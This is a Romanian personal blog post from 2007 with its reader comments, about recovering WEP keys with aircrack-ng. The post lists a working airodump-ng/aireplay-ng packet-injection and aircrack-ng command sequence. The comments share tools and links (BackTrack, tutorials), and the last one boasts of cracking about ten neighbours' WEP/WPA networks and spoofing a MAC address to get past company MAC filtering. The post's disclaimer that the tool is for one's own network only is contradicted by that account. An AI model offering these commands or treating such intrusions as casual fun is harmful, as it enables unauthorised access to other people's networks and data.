Aircrack
June 18th, 2007 by 
admin
Am citit ghidul de pe www.linux-geek.org referitor la recuperarea cheii WEP dintr-o retea wireless, si mi-a mers(pe reteaua mea de acasa). Ascultati ce zice baiatu` asta ca are dreptate. Pe scurt:
mkdir ./dumps
cd ./dumps
airodump-ng -c channel - -bssid BSSID -w dump eth1
//// si n acelasi timp cu airodump-ng:
aireplay-ng -1 0 -e ESSID -a BSSID -h YOUR_MAC eth1
//// dupa care
aireplay-ng -3 -b BSSID -h YOUR_MAC eth1
//// dar tot in acelasi timp cu airodump-ng -ul initial. acum asteptati pana in airodump-ng
/////la coloana Data aveti cateva zeci de mii. Atunci opriti-l, si
aircrack-ng -z dump*.cap
Acum incerc sa imi fac Kismet-ul sa mearga pe linux, ptr ca ceva nu ii convine si nu stiu ce. oricum am NetStumbler pe windows care merge excelent
.
P.S.: Atentie, dupa cum am mentionat, Aircrack-ul se foloseste doar in reteaua proprie, si pentru testarea vulnerabilitatilor! Rularea impotriva altor retele este interzisa de lege!
Posted in Despre mine | 
Loading ...
January 25th, 2008 at 7:21 am
Salut! Crezi k ai putea explica si procesul pentru Windows (XP) de “crack”-uire? M-ar interesa chiar de la faza de instalare. Eu nu am reusit sa-l fac sa mearga probabil pentru ca omit ceva. Ideea e ca trebuie niste drivere mai speciale pentu placa mea de Wireless (Atheros 5006) (incorporata in laptop), dar acestea nu merg… Da-mi te rog o idee. Multumesc!
January 25th, 2008 at 12:08 pm
Teoretic merge si sub windows, dar sub un numar foarte mic de placi wireless. Si foarte prost(incet si nesigur).
Totusi pe ce zici tu ca ai (Atheros) ar trebui sa mearga (http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)
Sincer nu am incercat pe windows chestia asta, ca amun Broadcom bcm43xx, si nu exista drivere pentru asa ceva. Am un usbstick cu ubuntu, pentru chestii din astea (parole, adrese mac, si alte lucruri murdare), si il folosesc doar la nevoie.
January 25th, 2008 at 8:56 pm
Multam de sfat. Crezi k ajuta filmuletzele de pe youtube? Pentru k mie nu mi se intampla ce se intampla lor oricat ash incerca… Eh! Poate k pana la urma o sa-mi iau un usbstick si io tot in acelasi scop ca si tine… Numai bine!
January 25th, 2008 at 9:12 pm
daca ai nevoie de detalii,baga un mail la admin @ kappakid . net
January 31st, 2008 at 2:48 pm
salve, vad ca pe la noi aircrack-ul e o chestie in ceatza, rau.Am un centrino duo cu care am reusit sa capturez pachete cu Omnipeek Personal.L-am lasat cam 10 h si am pus un filtru pentru a captura pachete de pe un anume ssid.Am dat drumul la aircrack si ruleaza de 10-12 h fara a da semne ca se pregateste sa termine.E normal?fisierul cu pachetele are 50 de mb.Mai spune ca am 792 de IV-uri disponibile.Nu stiu daca sunt indeajuns pentru cheie.Ce zici, sunt pe drumul cel bun, sau am iesit din decor.Ziceai de ubuntu pe un stick?Ai timp sa ma luminezi si pe mine?Merci
January 31st, 2008 at 3:18 pm
@Bogdan: Am un raspuns sigur in cazul tau
nu ai suficiente IV-uri. Pentru un WEP 64bits ai nevoie de vreo 50000 IV-uri, pentru unul de 128bits, mai mult (poate 100000).
Daca esti pe windows, e foarte complicata faza. Daca esti pe linux, poti porni interceptarea (airodump-ng), si injectia de pachete (sa iti bagi tu nasu si sa generezi pachete) in acelasi timp. Eu am ajuns la 50 mii pachete in 2-3 minute
January 31st, 2008 at 3:20 pm
tot @Bogdan: linuxul poate face usor injectie de pachete, insa la cat de putin il folosesc eu ca sistem de operare, nu merita sa il pun pe hard. De aia am incercat sa pun pe un usb(hai sa fiu cinstit, BlackNight mi l-a facut), astfel cand am nevoie sa “testez” o cheie wep, bag stick-ul si ma ocup
din pacate inca nu am reusit mare lucru, 1 se misca infect si 2 am niste probleme cu salvarea fisierelor si setarilor
February 2nd, 2008 at 2:21 pm
Kappacelu`, merci mult de promptitudine si sfaturi.E adevarat, e greu in Win si de aia ma gandesc sa incerc cu o editie bootabila de Linux.Cand ai timp ma poti ajuta cu cateva hint-uri?ce editie, cam de unde o iau si ce mai am nevoie in afara de aircrack.Trebuie sa mai mentionez ca nu reusesc sa capturez cu airodump pentru ca nu am o placa wi-fi(deocamdata) bazata pe chipset atheros sau hermes cum suporta airodump-ul.M-ai putea ajuta si pe mine cu editia aia usb, nu stiu, pe dc, un ftp?sau pe un site de upload?Uite aici un tool usor de folosit, poate stii de el http://nazircon.googlepages.com/.Din pacate aceeasi poveste, placa mea nu poate intra in monitor mode decat in omnipeek.Pana voi avea bani sa-mi iau alta placa mai “compatibila”, as incerca cu Linux-ul ala smecher
Merci de raspuns 
Deocamdata stau in monitor mode in omnipeek pe laptop de 17 h…
February 2nd, 2008 at 3:21 pm
@Bodgan: Eu am avut la un moment dat Ubuntu linux instalat pe laptop (pe hdd, nu pe usb stick), si acolo mi-am facut de cap, am invatat sa compilez kernelu ca sa imi mearga wirelessu, etc, si am instalat si aircrack-ul. Si chiar mergea.
Insa ce stiu iti pot da. Eventual cand o sa am timp o sa scriu un tutorial amanuntit despre ce si cum se face.
Hint-uri multe nu pot sa iti dau pentru ca si eu la randul meu cer ajutorul altora
In legatura cu linux-ul nu se prea pune problema care e mai “smecher”, teoretic oricare ar trebui sa suporte chestia asta, insa eu am testat doar pe debian / ubuntu.
February 2nd, 2008 at 3:54 pm
Am citit paginile date de tine si chiar am de gand sa ma ocup curand de un tutorial despre aircrack si de-astea. te anunt pe mail cand va apare (eventual poti tu sa te inscrii sa iti vina pe mail ce postez - in dreapta sus ai o casuta)
February 2nd, 2008 at 6:45 pm
Salve din nou Kappacelu’.Cu mailul asa am si facut.Am gasit o editie bootabila de Linux special (se spune) facuta pentru chestii de-astea ;Backtrack 2 sau 3 beta http://www.remote-exploit.org/backtrack_download.html.Abia astept sa o incerc, sunt la 75%.Din cate am inteles are suport pentru placile wireless intel si Aircrack-ul deja instalat.Am gasit deja si un tutorial fain facut aici http://www.darkmindz.com/article_read.dmz?id=120.Astept sa il testez.Ar fi excelent daca reusesti sa faci un tutorial, sunt convins ca multi ti-ar multumi, eu abia astept.Bafta
!
February 2nd, 2008 at 8:57 pm
@Bogdan: da, am vazut si eu distributia aia de linux,pare interesanta, si cica pune accent si pe multe chestii hardware. In seara asta scot un .iso, insa dupa cum nu imi merge unitatea optica la notebook, nu prea cred ca am cum sa o scriu pe cd. Astept pareri despre el,cand incerci
February 3rd, 2008 at 2:34 pm
Salve, deocamdata nu am reusit sa o incerc pentru ca imi cade netul din ora in ora (si nu am reusit s-o descarc inca).Vezi tot acolo ca este si o editie usb despre care scriu ei ca este si mai “stufoasa” in aplicatii, poate pana reusesc eu, ne spui cum ti se pare, bafta kappacelu’!
February 3rd, 2008 at 2:35 pm
@bogdan: stiu,dar datorita vitezei, prefer live cd
February 10th, 2008 at 6:35 pm
salve Kappacelu’!Imi pare rau ca am lipsit ceva timp, din pacate nu am mai avut timp, dar in fine am testat Backtrac 3 beta live cd si…mergeeee!Incredibil cat de simplu poate fi in linux si cat de complicat este in windows.Pe langa faptul ca si-a facut treaba perfect, arata exceptional(am inteles ca este un distro slackware)si este la fel de intuitiv ca si win-ul.Sunt uimit,zilele astea il voi instala pe bune pe hard(nu live cd).Am sa pun si tutorialele:
-datorita faptului ca folosesc un laptop cu chipset Centrino, placa wireless Intel 3945 ABG, nu a putut fi facuta sa intre automat in “monitor mode” decat dupa ce am facut ca aici :
http://www.neothermic.com/phpBB/viewtopic.php?t=138
-apoi am urmat sfaturile de aici, pas cu pas:
http://www.smallnetbuilder.com/content/view/30114/98/
excelent tutorial!.Mai postez inca odata link-ul cu distro-ul Backtrack 2 sau beta 3:
http://www.remote-exploit.org/backtrack_download.html.
Abia astept ca si altii sa reuseasca, sa impartasim rezultatele !Pana atunci salve !
February 10th, 2008 at 9:32 pm
Astept detalii. Mie inca nu mi-a mers pe windows (nu am nici un adaptor wireless compatibil),dar voi mai incerca cu diverse distributii live
February 11th, 2008 at 10:54 am
Hello!Eu zic sa rulezi live cd-ul si sa urmezi pas cu pas tutorialul asta http://www.smallnetbuilder.com/content/view/30114/98/.S-ar putea sa ai surpriza sa constati ca placa ta (sub Win incompatibila)sa poata intra in monitor mode.Cauta pe google cu numele placii si monitor mode, poate exista o sansa sub Backtrack sau aici, http://wiki.remote-exploit.org/index.php/Hardware_Compatibility.Nu se stie, s-ar putea sa ai surprize placute.Teoretic placa mea wireless de pe pc(nu laptop)nu suporta sub nici o forma monitor mode in windows, dar am avut surpriza sa o gasesc compatibila in Backtrack.Sunt tare curios!Ce placa ai, apropos?Spuneai ca vei mai incerca si cu alte distributii live, ai incercat cu BT si nu a mers?Se pare ca asta e cea mai tare pentru chestii de astea “Made by hackers for hackers”, cum se zice.
February 25th, 2008 at 6:07 am
Salve Kappacelu’!Ce faci?nu ai mai postat nimic aici, in sectiunea Aircrack.Recunosc ca nici eu nu am mai postat caci dupa cum scriam ce am avut de rezolvat, am reusit cu Backtrack.Dupa prima reusita, in timpul liber ajunsesem sa ma distrez spargand cheile wep sau wpa ale retelelor wireless din zona mea (sunt vreo 10).Cu ocazia asta am descoperit si cat de vulnerabila este aceasta criptare, pe 64 sau 128 de biti.Am mai remarcat ca unele retele ale unor firme cu baieti (presupun) specializati in securizare wireless mai folosesc si blocarea mac-urilor calculatoarelor care nu sunt in reteaua lor.In scurt timp am rezolvat si problema asta spoofuind-umi macul placii.Am ramas nitel perplex cat de usor poti naviga in reteaua cuiva, fara ca cineva sa aiba habar…